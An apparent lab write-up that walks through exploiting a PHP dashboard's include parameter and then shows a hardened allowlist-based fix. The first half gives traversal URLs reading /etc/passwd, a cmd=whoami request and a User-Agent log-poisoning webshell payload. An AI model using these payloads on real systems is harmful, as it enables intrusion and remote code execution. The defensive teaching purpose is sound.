Let's take a look at this exposed PHP code and walk through it line by line to determine how it can be exploited.
The webpage simply displays the output of pageB.php or pageA.php using `GET /dashboard.php?show=pageB` or `GET /dashboard.php?show=pageA`.
Observing `if(containsStr($_GET['show'], 'pageB') | containsStr($_GET['show'], 'pageA'))`
we can determine that the `show=pageB` or `show=pageA` string must be present for successful execution. If these conditions are met, `$_GET["ext"] : '.php'` appends the `.php` extension to pageB or pageA (the extension defaults to `.php` but is taken from the `ext` parameter when one is supplied). If these conditions are NOT met you are met with the message 'You can select either one of these only'.
We can take advantage of this code to view backend PHP code from other pages of the website by passing the `show=pageB` string and defining the `ext` parameter ourselves, which could reveal useful information to an attacker.
http://x.x.x.x/dashboard.php?show=pageB&ext=../login.php
Furthermore, we may be able to use this to traverse out of the website's root directory for LFI:
http://x.x.x.x/dashboard.php?show=pageB&ext=../../../../etc/passwd
If LFI is successful, command injection is highly likely, which can lead to access to the hosting server.
http://x.x.x.x/dashboard.php?show=pageB&ext=&cmd=whoami
Capture the request with Burp and change the User-Agent header to `<?php system($_GET['cmd']); ?>`.
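For contrast, here is how the include logic should have been written so that none of the above works. This is an added example, not the page's original dashboard.php: it assumes the two pages live in a `./pages` directory next to the script, never builds a path from request input (the `ext` parameter is simply ignored), and confirms with `realpath()` that the resolved file stays inside that directory.

```php
<?php
// Hardened dashboard.php (added example, not the original code).
// The vulnerable version concatenates $_GET['show'] with a user-controlled
// $_GET['ext'], so the include path is attacker-controlled. Here the request
// only selects a key from a fixed allowlist; the file name is never derived
// from user input, so "../" sequences and arbitrary extensions have no effect.

declare(strict_types=1);

// The key must equal the whole ?show= value; no substring matching.
const ALLOWED_PAGES = [
    'pageA' => 'pageA.php',
    'pageB' => 'pageB.php',
];

// Assumed layout: includable pages live in ./pages relative to this script.
const PAGES_DIR = __DIR__ . '/pages';

function resolvePage(?string $show): ?string
{
    if ($show === null || !array_key_exists($show, ALLOWED_PAGES)) {
        return null;
    }
    $base   = realpath(PAGES_DIR);
    $target = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$show]);
    if ($base === false || $target === false) {
        return null;
    }
    // Defence in depth: the resolved file must still sit under PAGES_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Note that $_GET['ext'] is deliberately not read anywhere.
$page = resolvePage($_GET['show'] ?? null);
if ($page === null) {
    http_response_code(400);
    echo 'You can select either one of these only';
    exit;
}
require $page;
```

With this version a request such as `show=pageB&ext=../login.php` is answered with the same 400 error as any other unknown page, and the access log is the place to look for such probes.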